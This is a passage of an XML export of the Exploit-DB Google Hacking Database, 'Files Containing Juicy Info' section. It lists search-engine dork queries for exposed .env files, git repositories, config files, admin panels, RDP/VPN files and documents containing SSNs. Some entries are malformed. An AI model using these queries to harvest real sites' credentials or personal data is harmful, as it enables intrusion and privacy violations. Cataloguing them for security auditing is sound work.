<querystring>https://www.google.com/search?q=intitle:\&quot;Index of cd&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8037</id>
<link>https://www.exploit-db.com/ghdb/8037</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl index.php id= site.bd</shortDescription>
<textualDescription># Google Dork: inurl index.php id= site.bd
# Files Containing Juicy Info
# Date:31/01/2023
# Exploit Author: Insha Ahsan Raj</textualDescription>
<query>inurl index.php id= site.bd</query>
<querystring>https://www.google.com/search?q=inurl index.php id= site.bd</querystring>
<edb></edb>
<date>2023-01-31</date>
<author>Insha Ahsan Raj</author>
</entry>
<entry>
<id>8173</id>
<link>https://www.exploit-db.com/ghdb/8173</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: &quot;/wp-content/uploads&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;/wp-content/uploads&quot;
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl: &quot;/wp-content/uploads&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;/wp-content/uploads&quot;</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Andrew Gimenez</author>
</entry>
<entry>
<id>8305</id>
<link>https://www.exploit-db.com/ghdb/8305</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: &quot;index of&quot; &quot;phpstan.neon&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;index of&quot; &quot;phpstan.neon&quot;
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: Mark Ivan David</textualDescription>
<query>inurl: &quot;index of&quot; &quot;phpstan.neon&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;index of&quot; &quot;phpstan.neon&quot;</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>8115</id>
<link>https://www.exploit-db.com/ghdb/8115</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: &quot;phpmyadmin/setup/&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;phpmyadmin/setup/&quot;
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: Arjun Chandarana</textualDescription>
<query>inurl: &quot;phpmyadmin/setup/&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;phpmyadmin/setup/&quot;</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Arjun Chandarana</author>
</entry>
<entry>
<id>7656</id>
<link>https://www.exploit-db.com/ghdb/7656</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: */.env</shortDescription>
<textualDescription># Google Dork: inurl: */.env
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>inurl: */.env</query>
<querystring>https://www.google.com/search?q=inurl: */.env</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>8284</id>
<link>https://www.exploit-db.com/ghdb/8284</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: .git</shortDescription>
<textualDescription># Google Dork: inurl: .git
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Jai kumar</textualDescription>
<query>New submission</query>
<querystring>https://www.google.com/search?q=New submission</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Jai kumar</author>
</entry>
<entry>
<id>7349</id>
<link>https://www.exploit-db.com/ghdb/7349</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /admin/webeditor/admin_login.asp</shortDescription>
<textualDescription># Google Dork: inurl: /admin/webeditor/admin_login.asp
# Files Containing Juicy Info
# Date:12/09/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>inurl: /admin/webeditor/admin_login.asp</query>
<querystring>https://www.google.com/search?q=inurl: /admin/webeditor/admin_login.asp</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>8358</id>
<link>https://www.exploit-db.com/ghdb/8358</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /adminer.php</shortDescription>
<textualDescription># Google Dork: inurl: /adminer.php
# Files Containing Juicy Info
# Date: 27/11/2023
# Exploit: Satyam Singh</textualDescription>
<query>inurl: /adminer.php</query>
<querystring>https://www.google.com/search?q=inurl: /adminer.php</querystring>
<edb></edb>
<date>2023-11-27</date>
<author>Satyam Singh</author>
</entry>
<entry>
<id>5495</id>
<link>https://www.exploit-db.com/ghdb/5495</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /config.txt ext:txt intext:</shortDescription>
<textualDescription>Google Dork: inurl: /config.txt ext:txt intext:</textualDescription>
<query>inurl: /config.txt ext:txt intext:</query>
<querystring>https://www.google.com/search?q=inurl: /config.txt ext:txt intext:</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>8221</id>
<link>https://www.exploit-db.com/ghdb/8221</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /default.rdp</shortDescription>
<textualDescription># Google Dork: inurl: /default.rdp
# Files Containing Juicy Info
# Date: 07/09/2023
# Exploit Author: Arjun Vijaypal Singh</textualDescription>
<query>inurl: /default.rdp</query>
<querystring>https://www.google.com/search?q=inurl: /default.rdp</querystring>
<edb></edb>
<date>2023-09-07</date>
<author>Arjun Vijaypal Singh</author>
</entry>
<entry>
<id>8183</id>
<link>https://www.exploit-db.com/ghdb/8183</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /libraries/joomla/database/</shortDescription>
<textualDescription># Google Dork: inurl: /libraries/joomla/database/
# Files Containing Juicy Info
# Date:08/05/2023
# Exploit Author: Mark Ivan David</textualDescription>
<query>inurl: /libraries/joomla/database/</query>
<querystring>https://www.google.com/search?q=inurl: /libraries/joomla/database/</querystring>
<edb></edb>
<date>2023-05-08</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>7831</id>
<link>https://www.exploit-db.com/ghdb/7831</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /wp-content/uploads/ inurl:&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt</shortDescription>
<textualDescription># Google Dork: inurl: /wp-content/uploads/ inurl:&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Ritwick Dadhich</textualDescription>
<query>inurl: /wp-content/uploads/ inurl:&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl: /wp-content/uploads/ inurl:&quot;robots.txt&quot; &quot;Disallow:&quot; filetype:txt</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Ritwick Dadhich</author>
</entry>
<entry>
<id>8018</id>
<link>https://www.exploit-db.com/ghdb/8018</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: /wp-includes/uploads</shortDescription>
<textualDescription># Google Dork: inurl: /wp-includes/uploads
# Files Containing Juicy Info
# Date:16/08/2022
# Exploit Author: Rajdip Chavan</textualDescription>
<query>inurl: /wp-includes/uploads</query>
<querystring>https://www.google.com/search?q=inurl: /wp-includes/uploads</querystring>
<edb></edb>
<date>2022-08-16</date>
<author>Rajdip Chavan</author>
</entry>
<entry>
<id>8048</id>
<link>https://www.exploit-db.com/ghdb/8048</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: administrator/components</shortDescription>
<textualDescription>#Google dork : inurl: administrator/components
#Category: Files containing Juicy info
#Date: 2/1/2023
#Exploit Author: Mark Ivan David
</textualDescription>
<query>inurl: administrator/components</query>
<querystring>https://www.google.com/search?q=inurl: administrator/components</querystring>
<edb></edb>
<date>2023-02-01</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>8046</id>
<link>https://www.exploit-db.com/ghdb/8046</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: administrator/components/com_admin/sql/updates/mysql/</shortDescription>
<textualDescription>#Google dork : inurl: administrator/components/com_admin/sql/updates/mysql/
#Category: Files containing Juicy info
#Date: October 08 2022
#Exploit Author: Mark Ivan David
</textualDescription>
<query>inurl: administrator/components/com_admin/sql/updates/mysql/</query>
<querystring>https://www.google.com/search?q=inurl: administrator/components/com_admin/sql/updates/mysql/</querystring>
<edb></edb>
<date>2023-02-01</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>8047</id>
<link>https://www.exploit-db.com/ghdb/8047</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: administrator/components/com_admin/sql/updates/sqlazure</shortDescription>
<textualDescription>#Google dork : inurl:
administrator/components/com_admin/sql/updates/sqlazure
#Category: Files containing Juicy info
#Date: 2/1/2023
#Exploit Author: Mark Ivan David
</textualDescription>
<query>inurl: administrator/components/com_admin/sql/updates/sqlazure</query>
<querystring>https://www.google.com/search?q=inurl: administrator/components/com_admin/sql/updates/sqlazure</querystring>
<edb></edb>
<date>2023-02-01</date>
<author>Mark Ivan David</author>
</entry>
<entry>
<id>7718</id>
<link>https://www.exploit-db.com/ghdb/7718</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: conf/fastcgi.conf</shortDescription>
<textualDescription># Google Dork: inurl: conf/fastcgi.conf
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>inurl: conf/fastcgi.conf</query>
<querystring>https://www.google.com/search?q=inurl: conf/fastcgi.conf</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>7935</id>
<link>https://www.exploit-db.com/ghdb/7935</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: document/d intext: ssn</shortDescription>
<textualDescription># Google Dork: inurl: document/d intext: ssn
# Files Containing Juicy Info
# Date: 6/2/2022
# Exploit Author: Christian Galvan
# An attacker may be able to discover sensitive files which contain Name, SSN, and other banking information
</textualDescription>
<query>inurl: document/d intext: ssn</query>
<querystring>https://www.google.com/search?q=inurl: document/d intext: ssn</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Christian Galvan</author>
</entry>
<entry>
<id>8329</id>
<link>https://www.exploit-db.com/ghdb/8329</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: edu + site: admin</shortDescription>
<textualDescription># Google Dork: inurl: edu + site: admin
# Files Containing Juicy Info
# Date: 08/11/2023
# Exploit: Anand J Nair</textualDescription>
<query>inurl: edu + site: admin</query>
<querystring>https://www.google.com/search?q=inurl: edu + site: admin</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Anand J Nair</author>
</entry>
<entry>
<id>7482</id>
<link>https://www.exploit-db.com/ghdb/7482</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: https://app.zerocopter.com/rd/</shortDescription>
<textualDescription># Google Dork: inurl: https://app.zerocopter.com/rd/
# Files Containing Juicy Info
# Date:23/10/2021
# Exploit Author: Akash Patil</textualDescription>
<query>inurl: https://app.zerocopter.com/rd/</query>
<querystring>https://www.google.com/search?q=inurl: https://app.zerocopter.com/rd/</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Akash Patil</author>
</entry>
<entry>
<id>8036</id>
<link>https://www.exploit-db.com/ghdb/8036</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: json beautifier online</shortDescription>
<textualDescription># Google Dork: inurl: json beautifier online
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: Nyein Chan Aung</textualDescription>
<query>inurl: json beautifier online</query>
<querystring>https://www.google.com/search?q=inurl: json beautifier online</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>Nyein Chan Aung</author>
</entry>
<entry>
<id>4058</id>
<link>https://www.exploit-db.com/ghdb/4058</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: mil|/issue.php filetype:xls</shortDescription>
<textualDescription>Files containing juicy info of the involved current issuers
Author : aye_robot</textualDescription>
<query>inurl: mil|/issue.php filetype:xls</query>
<querystring>https://www.google.com/search?q=inurl: mil|/issue.php filetype:xls</querystring>
<edb></edb>
<date>2015-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>8057</id>
<link>https://www.exploit-db.com/ghdb/8057</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: wp-content/plugin/404-redirection-manager</shortDescription>
<textualDescription># Google Dork: inurl: wp-content/plugin/404-redirection-manager
# Files Containing Juicy Info
# Date:09/02/2023
# Exploit Author: Rutvik Jaini</textualDescription>
<query>inurl: wp-content/plugin/404-redirection-manager</query>
<querystring>https://www.google.com/search?q=inurl: wp-content/plugin/404-redirection-manager</querystring>
<edb></edb>
<date>2023-02-09</date>
<author>Rutvik Jaini</author>
</entry>
<entry>
<id>8059</id>
<link>https://www.exploit-db.com/ghdb/8059</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl: wp-content/plugin/8-degree-notification-bar</shortDescription>
<textualDescription># Google Dork: inurl: wp-content/plugin/8-degree-notification-bar
# Files Containing Juicy Info
# Date:09/02/2023
# Exploit Author: Rutvik Jaini</textualDescription>
<query>inurl: wp-content/plugin/8-degree-notification-bar</query>
<querystring>https://www.google.com/search?q=inurl: wp-content/plugin/8-degree-notification-bar</querystring>
<edb></edb>
<date>2023-02-09</date>
<author>Rutvik Jaini</author>
</entry>
<entry>
<id>4586</id>
<link>https://www.exploit-db.com/ghdb/4586</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;.hg/store/fncache&quot;</shortDescription>
<textualDescription>hg repository dork
@tahaSuleyman</textualDescription>
<query>inurl:&quot;.hg/store/fncache&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.hg/store/fncache&quot;</querystring>
<edb></edb>
<date>2017-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>8149</id>
<link>https://www.exploit-db.com/ghdb/8149</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;.ir/&quot; intext:&quot;index of /&quot; &quot;.ovpn&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;.ir/&quot; intext:&quot;index of /&quot; &quot;.ovpn&quot;
# Files Containing Juicy Info
# Date:10/04/2023
# Exploit Author: Azar A. Nariman</textualDescription>
<query>inurl:&quot;.ir/&quot; intext:&quot;index of /&quot; &quot;.ovpn&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.ir/&quot; intext:&quot;index of /&quot; &quot;.ovpn&quot;</querystring>
<edb></edb>
<date>2023-04-10</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>5576</id>
<link>https://www.exploit-db.com/ghdb/5576</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/.vscode/ftp-sync.json&quot;</shortDescription>
<textualDescription>inurl:&quot;/.vscode/ftp-sync.json&quot;
--
Maxime Westhoven
</textualDescription>
<query>inurl:&quot;/.vscode/ftp-sync.json&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/.vscode/ftp-sync.json&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Maxime Westhoven</author>
</entry>
<entry>
<id>5575</id>
<link>https://www.exploit-db.com/ghdb/5575</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/.vscode/sftp.json&quot;</shortDescription>
<textualDescription>inurl:&quot;/.vscode/sftp.json&quot;
--
Maxime Westhoven
</textualDescription>
<query>inurl:&quot;/.vscode/sftp.json&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/.vscode/sftp.json&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Maxime Westhoven</author>
</entry>
<entry>
<id>8222</id>
<link>https://www.exploit-db.com/ghdb/8222</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.
# Files Containing Juicy Info
# Date: 08/09/2023
# Exploit Jannatul Adnin</textualDescription>
<query>My name is Jannatul Adnin and I would like to report a new Google dork.</query>
<querystring>https://www.google.com/search?q=My name is Jannatul Adnin and I would like to report a new Google dork.</querystring>
<edb></edb>
<date>2023-09-08</date>
<author>Jannatul Adnin</author>
</entry>
<entry>
<id>8118</id>
<link>https://www.exploit-db.com/ghdb/8118</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/api-docs&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/api-docs&quot;
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: Arjun Chandarana</textualDescription>
<query>inurl:&quot;/api-docs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/api-docs&quot;</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>Arjun Chandarana</author>
</entry>
<entry>
<id>7456</id>
<link>https://www.exploit-db.com/ghdb/7456</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/app/kibana#&quot;</shortDescription>
<textualDescription># Google Dork: Re: inurl:&quot;/app/kibana#&quot;
# Files Containing Juicy Info
# Date:17/10/2021
# Exploit Author: Sandesh Ajgekar</textualDescription>
<query>inurl:&quot;/app/kibana#&quot;</query>
<querystring>https://www.google.com/search?q=Re: inurl:&quot;/app/kibana#&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Sandesh Ajgekar</author>
</entry>
<entry>
<id>4412</id>
<link>https://www.exploit-db.com/ghdb/4412</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/attachment/&quot; ext:log</shortDescription>
<textualDescription>Finds web application logs that have LOTS of info ;)
Dxtroyer</textualDescription>
<query>inurl:&quot;/attachment/&quot; ext:log</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/attachment/&quot; ext:log</querystring>
<edb></edb>
<date>2017-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>749</id>
<link>https://www.exploit-db.com/ghdb/749</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/axs/ax-admin.pl&quot; -script</shortDescription>
<textualDescription>This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats.</textualDescription>
<query>inurl:&quot;/axs/ax-admin.pl&quot; -script</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Faxs%2Fax-admin.pl%22+-script</querystring>
<edb></edb>
<date>2004-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4789</id>
<link>https://www.exploit-db.com/ghdb/4789</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/bigdump.php&quot; + intitle:&quot;BigDump ver.&quot;</shortDescription>
<textualDescription>inurl:&quot;/bigdump.php&quot; + intitle:&quot;BigDump ver.&quot;
Show &quot;BigDump: Staggered MySQL Dump Importer&quot; Page
ManhNho
</textualDescription>
<query>inurl:&quot;/bigdump.php&quot; + intitle:&quot;BigDump ver.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/bigdump.php&quot; + intitle:&quot;BigDump ver.&quot;</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8321</id>
<link>https://www.exploit-db.com/ghdb/8321</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/bitrix/redirect.php?goto=&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/bitrix/redirect.php?goto=&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Kurmasheva Tatiana</textualDescription>
<query>Google Dork: inurl:&quot;/bitrix/redirect.php?goto=&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: inurl:&quot;/bitrix/redirect.php?goto=&quot;</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Kurmasheva Tatiana</author>
</entry>
<entry>
<id>8297</id>
<link>https://www.exploit-db.com/ghdb/8297</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/cgi-bin/home.ha&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/cgi-bin/home.ha&quot;
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit: Louise E</textualDescription>
<query>inurl:&quot;/cgi-bin/home.ha&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/home.ha&quot;</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Louise E</author>
</entry>
<entry>
<id>5119</id>
<link>https://www.exploit-db.com/ghdb/5119</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/cgi-bin/WS_FTP.LOG&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ Find filed in cgi-bin directories ++
inurl:&quot;/cgi-bin/WS_FTP.LOG&quot;
</textualDescription>
<query>inurl:&quot;/cgi-bin/WS_FTP.LOG&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/WS_FTP.LOG&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>249</id>
<link>https://www.exploit-db.com/ghdb/249</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/cricket/grapher.cgi&quot;</shortDescription>
<textualDescription>This search reveals information about internal networks, such as configuration, services, bandwidth.</textualDescription>
<query>inurl:&quot;/cricket/grapher.cgi&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22%2Fcricket%2Fgrapher.cgi%22</querystring>
<edb></edb>
<date>2004-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4491</id>
<link>https://www.exploit-db.com/ghdb/4491</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/data/urllist.txt&quot; ext:txt -git</shortDescription>
<textualDescription>Finds plaintext sitemaps, containing pages which robots.txt disallows
Dxtroyer</textualDescription>
<query>inurl:&quot;/data/urllist.txt&quot; ext:txt -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/data/urllist.txt&quot; ext:txt -git</querystring>
<edb></edb>
<date>2017-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>8328</id>
<link>https://www.exploit-db.com/ghdb/8328</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/database.json&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/database.json&quot;
# Files Containing Juicy Info
# Date: 07/11/2023
# Exploit Author: Raouf
</textualDescription>
<query>inurl:&quot;/database.json&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/database.json&quot;</querystring>
<edb></edb>
<date>2023-11-07</date>
<author>Raouf</author>
</entry>
<entry>
<id>4370</id>
<link>https://www.exploit-db.com/ghdb/4370</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/debug/default&quot; intitle:&quot;Yii Debugger&quot;</shortDescription>
<textualDescription>Yii Debugger PHP Framework Server Information.
Also other dorks.
inurl:&quot;/debug/default/view?panel=&quot;
inurl:&quot;/debug/default/view?&quot;
-Xploit </textualDescription>
<query>inurl:&quot;/debug/default&quot; intitle:&quot;Yii Debugger&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/debug/default&quot; intitle:&quot;Yii Debugger&quot;</querystring>
<edb></edb>
<date>2016-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4696</id>
<link>https://www.exploit-db.com/ghdb/4696</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/etc/fail2ban/&quot; + ext:conf</shortDescription>
<textualDescription>inurl:&quot;/etc/fail2ban/&quot; + ext:conf
Fail2ban config files
inurl:&quot;/etc/fail2ban/filter.d/&quot; + ext:conf
Fail2ban filter.d config files
ManhNho
</textualDescription>
<query>inurl:&quot;/etc/fail2ban/&quot; + ext:conf</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/etc/fail2ban/&quot; + ext:conf</querystring>
<edb></edb>
<date>2018-03-12</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4431</id>
<link>https://www.exploit-db.com/ghdb/4431</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/fb_ca_chain_bundle.crt&quot; ext:crt</shortDescription>
<textualDescription>Finds security certificates left behind by Facebook, potentially having
some useful info.
Dxtroyer</textualDescription>
<query>inurl:&quot;/fb_ca_chain_bundle.crt&quot; ext:crt</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/fb_ca_chain_bundle.crt&quot; ext:crt</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>5669</id>
<link>https://www.exploit-db.com/ghdb/5669</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/fmi/webd&quot; intitle:&quot;FileMaker WebDirect&quot;</shortDescription>
<textualDescription># Google Dork : inurl:&quot;/fmi/webd&quot; intitle:&quot;FileMaker WebDirect&quot;
# Description: Find websites where Filemaker applications are saved. Users
can run them from the web browser. Some applications do not have user
authentication, allowing us to find sensitive data depending on the purpose
of the application.
# Category : Files Containing Juicy Info
# Date : 17/12/2019
# Author : Leandro Naranjo
# Social: @tw1_lea
</textualDescription>
<query>inurl:&quot;/fmi/webd&quot; intitle:&quot;FileMaker WebDirect&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/fmi/webd&quot; intitle:&quot;FileMaker WebDirect&quot;</querystring>
<edb></edb>
<date>2019-12-18</date>
<author>Leandro Naranjo</author>
</entry>
<entry>
<id>4616</id>
<link>https://www.exploit-db.com/ghdb/4616</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/horde/test.php&quot;</shortDescription>
<textualDescription>Exploit Title:horde php information disclosure
Google Dork:inurl:&quot;/horde/test.php&quot;
date:11/14/2017
Exploit Author:Cameron Maerz
Vendor Homepage: https://www.horde.org
</textualDescription>
<query>inurl:&quot;/horde/test.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/horde/test.php&quot;</querystring>
<edb></edb>
<date>2017-11-15</date>
<author>Cameron Maerz</author>
</entry>
<entry>
<id>3748</id>
<link>https://www.exploit-db.com/ghdb/3748</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/includes/config.php&quot;</shortDescription>
<textualDescription>The Dork Allows you to get data base information from config files. Author: XeNon</textualDescription>
<query>inurl:&quot;/includes/config.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/includes/config.php&quot;</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4410</id>
<link>https://www.exploit-db.com/ghdb/4410</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/irclogs/&quot; ext:log</shortDescription>
<textualDescription>Finds people's IRC logs
Dxtroyer</textualDescription>
<query>inurl:&quot;/irclogs/&quot; ext:log</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/irclogs/&quot; ext:log</querystring>
<edb></edb>
<date>2017-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8259</id>
<link>https://www.exploit-db.com/ghdb/8259</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/login.php&quot; intitle:&quot;admin&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/login.php&quot; intitle:&quot;admin&quot;
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>inurl:&quot;/login.php&quot; intitle:&quot;admin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/login.php&quot; intitle:&quot;admin&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>4538</id>
<link>https://www.exploit-db.com/ghdb/4538</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/logs/www&quot; ext:log</shortDescription>
<textualDescription>Finds connection logs, with user agents, errors, and more
Dxtroyer</textualDescription>
<query>inurl:&quot;/logs/www&quot; ext:log</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/logs/www&quot; ext:log</querystring>
<edb></edb>
<date>2017-06-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4900</id>
<link>https://www.exploit-db.com/ghdb/4900</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/p3p.xml&quot; | intitle: &quot;p3p.xml&quot; -github.com</shortDescription>
<textualDescription>inurl:&quot;/p3p.xml&quot; | intitle: &quot;p3p.xml&quot; -github.com
p3p.xml files
ManhNho
</textualDescription>
<query>inurl:&quot;/p3p.xml&quot; | intitle: &quot;p3p.xml&quot; -github.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/p3p.xml&quot; | intitle: &quot;p3p.xml&quot; -github.com</querystring>
<edb></edb>
<date>2018-08-03</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6731</id>
<link>https://www.exploit-db.com/ghdb/6731</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/php/info.php&quot; &quot;PHP Version&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/php/info.php&quot; &quot;PHP Version&quot;
# Pages containing juicy info.
# Date: 16/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;/php/info.php&quot; &quot;PHP Version&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/php/info.php&quot; &quot;PHP Version&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4415</id>
<link>https://www.exploit-db.com/ghdb/4415</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/phpinfo.php&quot; &quot;PHP Version&quot;</shortDescription>
<textualDescription>Finds phpinfo() pages that give you lots of handy info!
Dxtroyer</textualDescription>
<query>inurl:&quot;/phpinfo.php&quot; &quot;PHP Version&quot;</query>
